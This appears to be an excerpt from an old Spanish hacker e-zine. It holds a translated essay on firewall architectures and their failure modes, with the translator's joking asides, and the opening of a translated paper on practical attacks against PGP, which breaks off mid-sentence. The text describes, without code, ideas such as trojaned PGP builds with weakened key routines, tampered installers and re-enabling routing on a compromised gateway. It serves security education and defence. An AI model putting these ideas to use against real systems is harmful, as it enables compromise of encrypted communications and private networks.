Si ignoras todo acerca de tu enemigo y de ti, ciertamente en cada batalla estaras
en peligro - Sun Tzu

Hay muchas maneras en las que un firewall puede fallar o quedar comprometido.
Mientras ninguna de ellas sea buena, definitivamente algunas son peores que otras. Ya que
el proposito de muchos firewalls es bloquear el acceso, es una verdadera falla si alguien
encuentra un agujero que le permita entrar en una red privada. Y una situacion mas
peligrosa si alguien consigue romper el firewall y reconfigurarlo para dar acceso a la red
privada a cualquier persona. Por consideracion a la terminologia este tipo de ataque sera
llamado "destruccion" de un firewall, que es opuesto al simple rompimiento del mismo. Es
estremadamente dificil cuantificar el da�o que puede resultar por la destruccion de un
firewall. Una importante medida de como un buen firewall resistira la amenaza es recoger
la informacion que ayude a determinir el curso de un ataque. Lo peor que puede pasarle a
una firewall es que este completamente comprometida sin ningun traceo de donde pudo haber
venido el ataque. Y lo mejor que puede pasar es detectar el ataque, e informar al
administrador que esta sufriendo un ataque, pero que ese ataque va a ser fallido.

Una forma de ver el resultado si un firewall esta comprometido es mirar las cosas en
terminos de que puede ser llamado "Zona de Riesgo". En el caso de una red que este
conectada directamente al Internet sin ningun firewall, la red entera esta propensa a
ataques. Esto no implica que la red es vulnerable a ataques, pero en algunos casos donde
redes enteras pueden alcanzar una red inalcanzable (Lease como lograr acceso a una red
por medio de otra que si tiene acceso a esa red. sorry, pero no sabia como ponerlo), es
necesario asegurarse de la seguridad (valga la redundancia) de cada host en esa red.
Experiencias practicas muestran que esto es dificil, hay herramientas como el rlogin que
da control de acceso que son aprovechados por los VANDALOS (vandalos..??? fuck you again)
para obtener acceso a multiples hosts, en forma de atakes de "Island Hopping" (es esto
algo asi como si el confia en ti, pero no en mi, y yo me hago pasar por ti, pues el
confiara y me dejara pasar...!!! XD ...). En el caso de cualquier firewall, la zona de
riesgo se reduce al firewall mismo, o a un selecto grupo de hosts en la red, reduciendo
significativamente el trabajo al administrador de la red en lo concerniente a los atakes
directos. Si el firewall es roto (si se logra tener acceso a el), la zona de riesgo se
expande nuevamente, e incluye TODA la red protegida. Un VANDALO (ya me harte de leer ese
termino... >:-( ) logra acceso a un login en el firewall puede empezar un atake tipo
island hopping contra la red privada, usando como base el login del firewall. En esta
situacion hay todavia una esperanza, ya que el VANDALO puede dejar sus pistas en el
firewall y puede ser detectado. Si el firewall es completamente destruido la red privada
puede ser atakada desde cualquier sistema externo y la reconstruccion del curso de un
atake llega a ser casi imposible. (esta parece ser la mejor opcion para los VANDALOS XDDDD)

En general, los firewalls pueden ser ser vistos en terminos de la reduccion de la
zona de riesgo a un solo punto. En sentido, esto parece ser una mala idea, ya que
significa poner todos los huevos en una canasta (esto no lo entendi...que comparaciones..
debe ser algo asi como y la unica canasta con todos los huevos se cae...??? eso seria un
huevonada jejejejeje), pero en la experiencia practica implica que en cualquier momento,
habra unos cuantos hosts que son vulnerables a ser accesados por un atakante inexperto.
Muchas empresas tienen politicas de seguridad dise�adas para afrontar esas debilidades,
pero es
muy tonto pensar que esas politicas son suficientes. Un firewall mejora la seguridad de
los hosts, haciendo entrar a los atakantes por un embudo, donde hay el chance de
detectarlos o atraparlos. Los castillos medievales bien construidos tenian multiples
murallas y puntos de defensa por esta misma razon.

(Bueno, despues de toda esta carreta concerniente a por que las empresas instalan
firewalls, pasamos a la chicha.. por fin, ya me estaba mamando..!!!)

FIREWALLS Y SUS COMPONENTES

Debe haber miles de posturas de combate, pero solo hay un proposito: GANAR
- Heiho Kaden

Hablando de firewalls muchas veces hay confusion en la terminologia, puesto que
todos se diferencian ligeramente en la implementacion y no en el proposito. Varias
discusiones en USENET indican que el termino "firewall" es usado para describir cualquier
eskema de seguridad entre redes. Para en proposito de simplificar la discusion, se
describira alguna de la terminologia, para dar una idea gneral:

SCREENING ROUTER: Un screening router es un componente basico de la mayoria de los
firewalls, Un screening Router (Algo asi como Router de pantalla) puede ser un router
comercial o un router basado en un host con algun tipo de paquete con capacidad de filtrar
informacion. Los screening routers tipicos tienen la habilidad de blokear el trafico entre
redes o a un host especifico, a nivel de puertos IP. Algunos firewalls consisten solamente
en un screening router entre una red privada y el Internet.

BASTION HOST: Los bastiones eran las partes mas fuertes de los castillos medievales
eran puntos desde donde se podian observar las areas criticas de defensa, usualmente tenian
fuertes murallas, cuartos para tropas de apoyo, y ocasionalmente tinajas de aceite
hirviendo para desalentar a los enemigos. Un host bastion es un sistema identificado por
el administrador del firewall como un punto altamente critico en la seguridad de la red.
Generalmente los Bastion Host tendran atencion extra para su seguridad, puede tener
auditorias frecuentes, y puede tener modificaciones en el software.

DUAL HOMED GATEWAY: Algunos firewalls son implementados sin un screening router
poniendo un sistema entre la red privada y la Internet, y deshabilitando el recorrido
del TCP/IP. El host en la red privada se puede comunicar con el gateway, asi como el host
en el Internet, pero el trafico directo entre las redes es blokeado. Por definicion un
Dual Homed Gateway es un bastion host.

(Ahora tratare de dibujar lo mejor posible el diagrama que esta en el documento...)

Figura 1: Un Dual Homed Gateway tipico

Bastion Host
__/__
| \ |
| / |
____\____
( internet ) -------------------| / |---------------------- ( Red Privada )
| \ |
----/----
\

No hay trafico directo entre las redes

(uff bueno, por lo menos se entiende..pero si prefieren me piden el gif y se los mando..)

SCREENED HOST GATEWAY: Posiblemente la configuracon de firewall mas comun es un
screened host gateway, es usada utilizando un screening router y un bastion host.
Usualmente el bastion host se encuentra en la red privada, y el screening router esta
configurado de tal manera que el bastion host es el unico sistema de la red privada que
puede ser alcanzado desde Internet. Frecuentemente el screening router esta configurado
para blokear el trafico al bastion host en algunos puertos especificos, permitiendo solo
que un peque�o numero de servicios se comuniquen con el.

(ohhhhh no, otra figura..!!!)

Figure 2: Screening Host Gateway tipico. __________________________
| ______ |
Tafico blokeado | | | |
\ / | _|______|_ |
(internet) --------------X---------------------------------|-----------| | |
/ \ | |__________| |
| _______ | Otros Hosts |
| |_______| | |
| | |
| Screening Router | Red Privada |
| | |
|____________________________ __|___ |
\ | |______________________|
Trafico permitido \ _|______|_
-------------------| |
|__________|

Bastion Host
(mmmm, parece que quedo mejor que el anterior...)

SCREENED SUBNET: En algunas configuraciones Firewall, se crea un asubred aislada,
y se situa entre Internet y la red privada. Tipicamente, esta red es aislada usando
screening routers, los cuales pueden implementar varios niveles de filtracion. Generalmente
una screened subnet es configurada para que ambos, tanto el Internet como la red privada
tengan acceso al host en la screened subnet, pero el trafico que pasa a traves de la subred
es bloqueado. Algunas configuraciones de estas subredes tienen un host bastion en la
red protegida, en ambos casos se soportan sesiones de terminal interactivas o niveles
gateways de aplicacion.
______________
Figura 3: Subred Screened Tipica | |
| ___|__
| | |
\ / | _|______|_
(Internet)-----------------------------X--------------------| | |
| Trafico Blokeado / \ | |__________|
| ________ | Otros Hosts
| |________| | |
| Screening Router | Private |
| | Network |
| |______________|
| ________________ |
\| | |
\ Screened | |
|\ Subnet | |
| \ ______ | |
| \| | | |
|___|______|_ | |
| |-----------------------------------------------+
|_________| Trafico Permitido
Bastion Host

NIVEL DE APLICACION GATEWAY (O PROXY GATEWAY): La mayoria del software en el Internet
trabajan en el modo almacenar-y-direccionar; los mailers y los servidores news en USENET recogen
la informacion, la examinan, y la encaminan hacia su direccion. Los niveles de aplicacion
gateway son servicios especificos para encaminar o reflejar, los cuales usualmente operan mejor
en el modo de usuario que en niveles de protocolo. Generalmente esos servicios de encaminamiento
cuando estan corriendo en un firewall, son importantes para tofda la seguridad. El famoso agujero
del sendmail que fue aprovechado por Gusano de Internet es un ejemplo de la clase de problemas de
seguridad que puede presentar un gateway a nivel de aplicacion. Otros gateway a nivel de
aplicacion son interactivos como los gateways del FTP y del TELNET que corren en los firewalls de
la Digital Equipment Corporation. En general, el termino "Gateway de Nivel de Aplicacion" sera
usado para describir algunos tipos de servicios de encaminamiento que corren a traves de un
firewall y es un potencial que concierne a la seguridad. En general, los gateways de niveles de
aplicacion cruciales corren en algunos hosts de tipo Bastion.

HYBRID GATEWAYS: Los gateways hibridos son los de tipo "algo mas" de la lista en esta
categoria. Ejemplos de como los sistemas pueden ser hosts conectados al Internet, pero
disponibles solo a traves de lineas seriales conectadas a una terminal ethernet de un servidor
en la red privada. Asi como el gateway puede aprovechar varios protocolos o hacer un tunneling
de un protocolo sobre otro. Los Routers pueden mantener y monitorear el estado de todas las
conecciones TCP/IP, o examinar el trafico para tratar de detectar y prevenir un atake. El
firewall de la compa�ia AT&T es un gateway hibrido combinado con un host Bastion.

Tomando los componentes descritos anteriormente, podemos describir con precision la
mayoria de las formas que pueden tomar los firewalls, y podemos describir algunos de los
tipos de problemas de seguridad que se pueden presentar. Asumiendo que el proposito basico
de un firewall es ayudar a la proteccion de la red, es importante examinar cada tipo de
firewall con respecto a:

CONTROL DE DA�OS: Si el firewall esta comprometido, que tipo de amenazas pueden dar
acceso a la red privada?. Si es destruida, que tipo de amenazas pueden dar acceso a la red
privada.?

ZONAS DE RIESGO: Que tan grande es la zona de riesgo durante la operacion normal.?
La medida de esta es el numero de hosts o routers que pueden ser probados desde fuera de la
red.

MODO DE FALLO: Que tan facil es detectar si el firewall ha sido roto?, Que tan
facil es detectar si el firewall ha sido destruido?, enuna operacion post Mortem (uffff que
termino...!!! XD), cuanta informacion se puede hallar para diagnosticar el atake.

EASE OF USE: Que tantos inconvenientes presenta el firewall?

STANCE: La filosofia de dise�o del firewall es "Lo que no esta expresamente
permitido esta prohibido?" o es "Lo que no esta expresamente prohibido esta permitido?"?

FIREWALLS USANDO SCREENING ROUTERS

"En la estrategia a gran escala, cuando el enemigo se embarca en un atake,
si muestras algo de fortaleza suprimiendo su tecnica, el cambiara de idea" - Miyamoto Musashi.

Muchas redes son protegidas con firewalls usando unicamente un screening router entre la red
privada y el Internet. Este tipo de Firewall es diferente de un gateway screened host en que
usualmente alli hay comunicacion permitida entre varios hosts en la red privada y varios
hosts en el Internet. la zona de riesgo es igual al numero de hosts en la red privada, y el
numero y tipo de servicios a los cuales el screening router les permite el trafico. Para
cada servicio que se provee via conexion punto a punto la zona de riesgo se amplia
considerablemente. y eventualmente es imposible de determinar. El control de da�os es muy
dificil, tanto que el administrador de la red necesitara examinar regularmente cada host
para encontrar pistas de un acceso. Si no hay revisiones regulares, la unica esperanza es
encontrar un indicio de algo asi como un registro de account errado.

En al caso de destruccion total del firewall, sera muy dificil encontrar pistas, e
incluso descubrirlo. Si se utiliza un router comercial (los cuales no utilizan registros
de las entradas), y el password de administracion del router esta comprometido, toda la red
privada puede estar en peligro y expuesta a atakes muy facilmente. Casos se han visto, donde
routers comerciales han sido configurados con reglas de screening erroneas, o quedar en
un modo pass-through (acceso directo) a causa de un error de hardware o de un operador.
Generalmente esta configuracion es del caso "Lo que no esta expresamente prohibido es
permitido" de la cual un usuario ingenioso puede facilmente jugar con los protocolos para
obtener un mayor nivel de acceso al deseado por el administrador.

Los screening routers no son la solucion mas segura, pero son populares, ya que
permiten acceso gratis a Internet desde cualquier punto de la red privada. Muchos
consultores y proveedores de servicio de redes ofrecen screening routers en sus
configuraciones de firewalls. Es incierto si los problemas que este presenta son conocidos
por los clientes. (Yo deberia decir que no, pues cual vendedor, antes de vender dice
cuales son los problemas que presenta el articulo que el quiere vender...de todas
formas gracias..!!! XD )

DUAL HOMED GATEWAY
El principio de Hannibal era mantener sus fuerzas unidas y agruparlos en una sola
fortaleza - Emperador Napoleon I

Un firewall usado frecuentemente y facil de utilizar es el dual homed gateway. Ya
que no encamina el trafico TCP/IP, actua como una muralla entre el Internet y la red privada.
Su facilidad de uso esta determinado en como el admisnitrador del sistema configura los
accesos a su antojo. Ya sea dando aplicaciones gateway asi como encaminamientos TELNET o
dando a los usuarios logins en el host gateway. Se toma el precedente, y la politica del
firewall esta definida como "Lo que no esta expresamente permitido es prohibido"; los
usuarios solo pueden accesar los servicios de Internet para los cuales estan las
aplicaciones gateway. Si los usuarios tienen cuantas, entonces, en la opinion del autor, la
seguridad del firewall queda seriamente debilitada. Durante la operacion normal, la unica
zona de riesgo es el host gateway mismo, ya que es el unico host que es alcanzable desde
el Internet. Si hay cuentas de usurios en el host gateway, y uno de los usuarios tiene un
password debil o tiene su cuenta comprometida de alguna otra manera (Ingenieria Social u
otros metodos), la zona de riesgo se expande hasta comprometer la red entera. Desde un punto
de control de da�os, el administrador puede seguir el progreso de un intruso, basado en los
modos de acceso de la cuenta comprometida, pero un vandalo experto puede hacer esto muy
dificil. Si un Dual Homed Gateway esta configurado de manera que los usuarios no tengan
acceso directo a el, el control de da�os puede ser mucho mas facil, ya que el mero hecho
que alguien se haya loggeado al host gateway se vuelve sin duda en un evento contra la
seguridad. Los dual homed gateways tiene ventaje sobre los screening routers desde el punto
de vista que el software del sistema es adaptable facilmente para mantener los logs del
sistema, copias impresas de los mismos, y logs remotos. Esto puede hacer mas facil el
rastreo post mortem para el gateway, pero puede, o puede que no, ayudar al administrador a
identificar que otros hosts en la red privada pueden estar comprometidos en un atake tipo
Island-Hopping.

Atakar a un dual homed gateway le deja al atakante unas cuantas opciones. si el
atakante consigue acceso a una red local obteniendo una cuenta, puede poner en marcha todos
los atakes disponibles para las redes locales. Sistemas de archivos NFS, debilidad en
archivos .rhosts, sistemas de distribucion automatica de software, programas de backup de
redes, y shell scripts administrativos. - Todos pueden ser un problema en los sistemas
de redes internas. Una vez se toma provecho de estos problemas, desde alli se puede tener
una base desde la cual lanzar atakes hacia el gatewat mismo. La mayor debilidad de un Dual
Homed Gateway es su modo de falla. Si el firewall es destruido, es posible que un atakante
experto pueda habilitar el ruteo a traves de toda la red privada y dejarla disponible para
nuevos atakes. En el Dual Homed Gateway basado en Unix, el ruteo del TCP/ip es deshabilitado
la variable ipforwarding del Kernel; si alguien obtiene los privilegios del administrador
en el gateway, la variable puede ser cambiada. Si embargo, esto parece ser muy lejano, pero
hay que tener monitorear el software, y las configuraciones en el host gateway, no es
improbable que un VANDALO con una copia de los Releases Notes del sistema operativo y una
cuenta pueda comprometer el sistema.

SCREENED HOSTS GATEWAYS
Donde el acceso es dificil, la via es tortuosa, y un enemigo peque�o puede derribar
al mas grande normalmente se le llama "Emboscada" - Sun Tzu

Muchos articulos han descrito los screened hosts gateways, y como construirlos.
Generalmente, un screened host gateway es muy seguro, y bastante facil de implementar.
Normalmente un host bastion es configurado en la red privada, con un screening router entre
el Internet y la red privada, el cual solo permite acceso a Internet al Bastion Host.
Ya que el Bastion Hosts se encuentra en la red privada, la conectividad para los usuarios
es muy buena, y los problemas que se presentan por los ruteos extra�os no estan presentes
en ellos. Si la red privada es, como muchas lo son, una extension virtual de una red local
el screened host gateway trabajara sin necesidad de hacer cambios en la red local, asi como
la red local estara usando un set legitimo de direcciones de red asignadas. La zona de
riesgo de un screened host gateway queda restringida unicamente al Bastion Host y al
screening router, y la sentencia de seguridad del screened host gateway se determina por
el software que corre en el sistema. Si un atakante logra acceso al Bastion Host, encontrara
una gran cantidad de de opciones para el atake al resto de la red. De todas formas, este
planteamiento es similar al de el Dual Homed Gateway, compartiendo los mismos modos de fallo
y dise�o, considerados con respecto al software que corre en el Bastion Host.

SCREENED SUBNETS
Cundo el enemigo adopta una posicion inconveniente, no lo dejes mirar a su alrededor.
- Miyamoto Musashi

Una screened Subnet es configurada usualmente con un Bastion Host como el unico
punto de acceso a la subred. La zona de riesgo es peque�a, consistente en el Bastion Host
o hosts, y cualquier screening router que hagan la conexion entre la screened subnet, el
Internet y la red privada. La facilidad de uso, y la regla basica de la screened subnet
puede variar, pero generalmente una screened subnet es utilizada por los firewalls que
aprovechan la ventaja del ruteo para reforzar la screening existente. Este planteamiento
fuerza a que todos los servicios que pasan a traves del firewall sean proveidos por
aplicaciones gateway, y pone la sentencia de "Lo que no esta expresamente permitido es
prohibido".

Si un Firewall basado en una screened subnet con el ruteo entre redes blokeado es atakado
con un intento de destruirlo, el atakante debe reconfigurar el ruteo en tres redes, sin
desconectarse o blokearse a si mismo, y sin que los cambios de ruteo sean notificados. No
hay duda que esto es posible, pero puede ser muy dificil si se deshabilita el acceso a
los screening routers a traves de la red, o configurando los screening routers, de manera
que solo permitan acceso desde un host especifico en la red privada. En este caso un
atakante necesitara entrar en el Bastion Host, y de ahi a uno de los hosts de la red
privada, para luego salir nuevamente hacia la screening router - y tendra que hacer todo
esto sin levantar alarmas (Esta como jodida la vaina.)

Otra de las ventajas de la screened subnet es que pueden ser instaladas de forma que
escondan cualquier accidente de historia que pueda recaer sobre la red privada. Muchos
sitios quieren conectarse a Internet se desaniman al tener que re-asignar direcciones a las
redes existentes. Con una screened subnet que blokee el ruteo entre redes, una red privada
puede ser conectada a Internet y luego cambiar gradualmente la direcciones de red de sus
subredes. De hecho, este planteamiento ha sido observado para acelerar significativamente
la adopcion de nuevas direcciones de red en redes privadas pobremente controiladas. Los
Usuarios estaran mas receptivos para el cambio de direccion de sus hosts si se dan cuenta
de los beneficios del Internet, ya que los hosts que no tengan una direccion correcta no
podran usar el firewall. En otros aspectos, la screened subnet es mucho mas dependiente
del suite de software que este corriendo en el Bastion Host. Resguardar toda una subred
provee funcionalidad similar al Dual Homed Gateway o al screened host gateway; difiere
principalmente en el nivel extra de complejidad en el ruteamiento y configuracion de los
screening routers.

GATEWAYS HIBRIDOS
En la guerra de la guerrilla no hay como una batalla decisiva; no hay nada
comparable al arreglo, a la defensa pasiva esta es una caracteristica de la guerra ortodoxa.
- Mao en la guerra de la guerrilla.

"La seguridad a traves de la oscuridad" no es suficiente en si misma, pero no hay
pregunta mas que una configuracion inusual, o una que sea dificil de entender, es como darle
una pausa al atake, o hacerlos revelarse a si mismos en el proceso de tratar de ver contra
que se estan enfrentando. De otro lado, es una ventaja real tener una configuracion que sea
facil de entender, y por lo tanto facil de evaluar y mantener. Ya que el Gateway Hibrido
esta calificado en la categoria de "Algo Mas" no intentaremos describir lo indescribible.
Algunos hibridos hipoteticos pueden servir para mostrar como los gateways hibridos pueden
ser diferentes entre si y ser similares a otros tipos.

Ahora hablaremos de un gateway hibrido que consiste en una caja colocada en el Internet,
la cual tiene la capacidad de rutear el trafico, y que tambien mantiene una nocion
completa del estado de cada coneccion TCP, cuantos datos han pasado a traves de ella,
desde donde fueron originados y su destino. Presumiblemente, las conecciones pueden ser
filtradas basadas en unas reglas especificas como: "Permitir el trafico entre el host A
en la red privada y todos los hosts en la red B a traves del servicio TELNET si, y solo si
la conexion originada desde el host A entre las 9:00 am y las 5:00 pm, y teniendo un log
del trafico" Esto suena terrible (Ya lo creo), dando control arbitrario con gran facilidad
de uso, pero algunos problemas simplemente se rehusan a desaparecer. Considerando que
alguien que desee pasar el firewall, entre a la red privada a traves de un modem que no
este protegido, le podria ser muy facil configurar un servicio escondido en el puerto del
TELNET. Esta es una forma facil de destruir un firewall.

Otro gateway hibrido puede tomar ventaja de las varias formas del tunneling de protocolos.
Suponiendo que la necesidad es conectarse a internet con restricciones hermeticas, pero se
necesita un alto grado de conectividad entre la red privada y una red externa en la cual
se confia. El arquetipo usual del gateway muestra como puede dar conectividad multiproposito
para e-mail, pero comunicaciones seguras punto a punto, una conexion virtual TCP/IP punto
a punto encriptada que debe ser configurada en el sistema remoto, a los cuales, despues los
usuarios se identifican con una tarjeta criptografica. Esto puede ser extremadamente seguro,
y puede ser muy facil de usar, pero tiene la desventaja que el controlador del protocolo
debe ser adicionado en cada sistema que quiera compartir comunicacion. Es dificil hacer
alguna conjetura sobre los fallos de ese sistema, pero la zona de riesgo es limitada a todos
los hosts que estan utulizando el driver del protocolo y a los usuarios individuales que
tienen las tarjetas de acceso. Algo de esto puede ser implementado en el Hardware o en los
mismos routers. En el futuro, dado el gran creciemiento del Internet habra mas desarrollos
en esta area, y surgiran varios gateways hibridos. Las reglas basicas en cuanto a
configuracion de firewalls posiblemente seguiran iguales a las aqui discutidas.

OTRAS HERRAMIENTAS RELACIONADAS CON LOS FIREWALLS
Sutil e Insustancial; El experto no dej huella; divinamente misterioso, es inaudible
- Sun Tzu

Hay busquedas activas y desarrollos de herramientas para agresivamente buscar e
identificar las debilidades de una red, o para detectar muestras que puedan indicar que un
atake esta en progreso. Esas herramientas van desde una simple lista de chequeo hasta
complejos "sistemas expertos" con deduccion de estrategias y elaboracion de reglas basicas.
Muchos firewalls de hoy corren software que esta dise�ado para adelantarse y recoger
informacion relativa a un posible atake y su origen, como el uso y abuso del finger y el
SNMP. A meno que verdadera inteligencia artificial sea desarrollada, esas herramientas
no pueden proteger contra una forma desconocida de atake, ya que no hay posibilidad de
igualar la creatividad de un Vandalo de redes. Aunque estos sistemas sean calificados
como Proactivos en realidad son reactivos, y generalmente solo serviran para detectar
crackers armados con trucos ya viejos. Pero eso no es tan facil, ya que eloos estan
siempre en busqueda y desarrollo de nuevas tecnicas para lograr entrar a un sistema.

NO SON CONCLUSIONES, PERO SI OBSERVACIONES (son del autor, no mias)
==========================================

Aquellos experimentados en la guerra cultivan el Tao y preservan las leyes, es por
esto que son capaces de formular politicas victoriosas. - Sun Tzu

Es el privilegio de un escritor usar la ultima seccion de una publicacion para dar
a conocer su opinion y llamarlas conclusiones. Hablando de firewalls, no es razonable decir
cual es la mejor eleccion, ya que hay muchos factores que determinan cual es
el mejor firewall para determinada situacion, como el costo, las politicas de la
empresa, la tecnologia de redes existente, y las politicas internas de
organizacion, estas son las razones de mas peso a tener en cuenta.

Las observaciones que se hacen sobre los firewalls son a un nivel muy general . Primeramente
el firewall es un apalancamiento - creciente dispositivo desde un punto de vista de direcci�n
de red. M�s bien que mirandolos como "todos los huevos en una de canasta," puede tambi�n ser
inspeccionada como una canasta confiable, y una cuesti�n simple desde que un sistema de
seguridad muy importante , pueda controlarse. El tama�o de la zona de riesgo es crucial al
dise�o; si es peque�o, la seguridad puede mantenerse y controlada f�cilmente , pero si
la seguridad se arregla, el da�o podria ser m�s severo.
Un segundo aspecto importante es que la configuracion de un firewall no es algo para
emprender a tontas y a locas.Muchos sitios se conectan con un cortafuego simple que consiste
de una selecci�n de router y nada m�s porque alguien les cont� que era lo suficientemente
seguro ".Establecer un cortafuego es definitivamente un �rea donde el tener antecedentes y
experianecias , nos serviran para mantener nuestro esquema de seguridad . Los v�ndalos sobre
la red tambien juntan experiencias y conocimientos asi que no hay que dejar que se nos adelanten .

El prop�sito de este documento no es desalentar a las compa��as a conectarse a Internet. El
Internet es un recurso incre�blemente valioso, tanto asi que en los a�os venideros cambiar�
completamente el metodo de trabajo de la gente y los comunicara a nivel global. Los beneficios
de conexi�n lejos exceden los costos, pero es sabio reducir posibles perdidas por intromisiones
a nuestra red por lo cual debermos crear conciencia y protegiendonos todo lo que sea necesario .
El prop�sito de este papel no es para sembrar "el temor, la incertidumbre y la duda" en
la orden de vender cualquier software o cortafuego particular .

TAkER

����������������������������������������������������������������������������������������

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# #
# 5.-Ataques pr�cticos contra PGP #
# #
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

_______________________________________________________________________ By Joel McNamara

Archivo original : Practical Attacks on PGP
Autor Original : Joel McNamara
Traducido por : Arturo Quirantes Sierra
Este texto ha sido publicado previa autorizacion de su autor Joel McNamara y del
Traductor del mismo , Arturo Quirantes . !!!

�Est�n tus mensajes cifrados mediante PGP a salvo de ojos depredadores? Aunque la
combinaci�n de IDEA, RSA y MD5 hace a PGP resistente a los ataques criptogr�ficos
conocidos, hay otras maneras de violar la seguridad de un usuario.

Esta presentaci�n discute ataques pr�cticos que un oponente puede usar para
comprometer PGP. Estos m�todos son generalmente mucho m�s eficientes y econ�micos
que intentos de reventar claves con gran coste de CPU. Vulnerabilidades tales como
acceso al archivo de intercambio [swap file], versiones de PGP e interfaces con
troyanos, vigilancia del teclado, fuerza bruta y robo de claves se explorar�n aqu�.
Se sugieren contramedidas para mejorar la seguridad.

Iba a dar la siguiente presentaci�n en Hacking in Progress 97 a las afueras de
Amsterdam, Holanda, en Agosto. Desafortunadamente, my descanso veraniego como
bombero forestal se puso por medio, con una tard�a temporada de incendios.
Dave Del Toro, de PGP Inc. presentar� una variaci�n del siguiente trabajo
que yo escrib� (que es versi�n .90), y ser� completado, incluyendo enlaces,
cuando tenga tiempo.

PGP se ha convertido en el est�ndar de facto para las comunicaciones cifradas
por Internet. Los algoritmos criptogr�ficos fuertes empleados, la naturaleza
abierta del c�digo fuente, revisi�n informal por expertos criptogr�ficos civiles,
todo ha dado a PGP un aura de invencibilidad contra fisgones potenciales.
Actualmente, la reputaci�n de PGP parece justificada. Los m�todos criptoanal�ticos
modernos no han descubierto ninguna debilidad evidente, y los ataques de fuerza
bruta contra claves de 1.024 bits y m�s son irrealistas. Descartando avances no
revelados en la factorizaci�n o la computaci�n cu�ntica, podemos conjeturar que
las agencias gubernamentales se han topado con las mismas barreras
criptoanal�ticas que se han encontrado los cript�grafos civiles.

Aunque un algoritmo fuerte es cr�tico en la seguridad de una aplicaci�n de cifrado,
el p�blico en general parece depositar demasiada fe en los n�meros y las ecuaciones
que proclaman que un mensaje cifrado no puede ser reventado. Las citas populares
como "se necesitar�a un tiempo igual a la edad del universo para reventar un mensaje
" o "podr�a ser reventado con tantos ordenadores como �tomos existen en la Tierra"
suenan como esl�ganes de anuncio.

Y, aunque computacionalmente hablando, tales afirmaciones puedan ser correctas,
desprecian un hecho simple.Hay numerosos ataques pr�cticos que no se apoyan en
criptoan�lisis, y que pueden esponer los contenidos de un mensaje cifrado con
PGP tan f�cilmente como pelar un pl�tano.

Esos ataques son baratos, eficientes, a veces dif�ciles de detectar, y pueden
ser elegantemente simples.
Hay una buena probabilidad de que ya est�n siendo usados durante actividades
de vigilancia de las fuerzas de seguridad, operaciones de obtenci�n de informaci�n
del gobierno, o esfuerzos de espionaje industrial.

Este trabajo describe ataques pr�cticos que pueden comprometer la seguridad de
PGP, particularmente en entorno Windows. (Para ser justos, estas debilidades no
son exclusivas de PGP. Acechan a la mayor�a de las aplicaciones criptogr�ficas
y de seguridad. Para mayor cr�dito de Phil Zimmermann, �l siempre ha estado
advirtiendo de los riesgos de estas clases de ataque en la documentaci�n de PGP.
Desafortunadamente, la mayor�a de la gente no se tomas los avisos en serio).

Recuerda, al igual que el consumo de un coche, su escenario de riesgo puede variar.

Ataques mediante caballos de Troya
==================================

Las aplicaciones estilo caballo de Troya son una buena herramienta en el arsenal
de un ladr�n de sistemas. El mundo UNIX ha estado plagado por troyanos, creados
por Hackers que facilitan puertas traseras tipo "�brete s�samo" con acceso a
sistemas. Pero hasta ahora, el mundo PC solo ha sido atacado por un pu�ado de
troyanos. T�picamente maliciosos en naturaleza, afirman mejorar tu vida,
pero acaban borrando tu disco duro.

La seguridad de PGP podr�a ser subvertida con un caballo de Troya. Se han escrito
varias pruebas de troyanos conceptuales que debilitar�an PGP, pero hasta ahora
no ha habido incidentes de ataques "al aire libre." La amplia escala de Internet
como mecanismo para conseguir software aumenta esta vulnerabilidad.

".EXE y DLL"

PGP puede ser atacado al introducir debilidades, bien mediante parches de c�digo
binario, o bien modificando y recompilando el c�digo fuente.

Las rutinas clave de PGP en peligro incluyen:

* Rutinas para generaci�n de n�meros aleatorios modificadas para arrojar
resultados predecibles.
* Rutinas de clave de sesi�n modificadas para que se use siempre la misma clave.
* Rutinas IDEA, RSA o MD5 debilitadas.
* Mensajes cifrados siempre con una clave adicional encubierta.
* La versi�n debilitada puede introducirse en el ordenador objetivo por medio de:
* Una aplicaci�n de caballo de Troya que encubiertamente parchea el programa binario.
* Reemplazar f�sicamente la copia leg�tima con una copia debilitada cuando el
usuario no se encuentra presente.
* Hacer pasar la copia debilitada como leg�tima y distribuirla por Internet
(una comprobaci�n reciente con AltaVista revel� varios centenares de direcciones
donde se puede descargar pgp262.zip o la versi�n internacional comparable).
* Un ataque de "hombre en el medio" donde el blanco descarga el programa que se
encuentra en una direcci�n leg�tima (p. ej. MIT) pero la sesi�n es interceptada,
y la copia del programa es sustituida
por otra debilitada. Aunque puedes usar dif o alguna otra utilidad para comparar
una aplicaci�n sospechosa con una copia leg�tima de una fuente conocida, un
ataque m�s sutil es parchear el c�digo mientras est� residente en la RAM con
una aplicaci�n troyana separada.

Aunque las copias, firmadas con PGP, del archivo ejecutable ofrece cierta
protecci�n contra versiones modificadas, varios investigadores han demostrado
que se pueden crear claves fraudulentas. Un usuario ignorante de tal hecho
podr�a ser potencialmente convencido de que el archivo ejecutable ha sido firmado
por una fuente fiable, cuando en realidad no lo ha sido

"Instalaci�n"

Las versiones tanto comerciales como gratuitas del recientemente aparecido
PGP 5.0 hace que �ste se obtenga mediante un archivo auto-extraible .EXE.
Resulta bastante trivial a�adir un parche para que se instalen programas
maliciosos en otros lugares, y que sen ejecutados antes de que el .EXE se ejecute.
Chris Drake, un consultor de seguridad australiano, ha producido varios
ejemplos de este tipo de ataque en una prueba. Aunque hay una firma asociada
con el instalador, muy poca gente comprueba la validez de las aplicacione firmadas.

"Interfaces [shells]"

La popularidad inicial de PGP fue alimentada por un conjunto de "shells" o
interfaces basados en Windows que enmascaraban los comandos del DOS,
dif�ciles de recordar, con men�s y cuadros de di�logo. Un estudio reciente
encontr� m�s de 30 de estos shells disponibles en Internet como gratuitos
o de dominio p�blico.

Los shells ayudaron en la aceptaci�n p�blica de PGP, pero la mayor�a est�n
patentados por naturaleza, y muy pocos autores muestran todo el c�digo fuente.
Los usuarios dependen de la integridad del autor, quien es habitualmente una
entidad desconocida en alg�n lugar distante. Las oportunidades para instalar
puertas traseras, comandos escondidos y fallos son m�ltiples. Y aunque un
programador tenga las mejores intenciones, fallos de programaci�n no descubiertos
pueden comprometer la seguridad del shell. Considera la pl�tora de agujeros
de seguridad descubiertos en programas de software comercial. Desafortunadamente,
el nivel de escrutinio dado a los fallos en los shells es como poco desalentador.

La vulnerabilidad de los shells ser� un hecho de la vida en el futuro pr�ximo.
La versi�n 5.0 de PGP tiene un interfaz "oficial" para Windows 95 (junto con
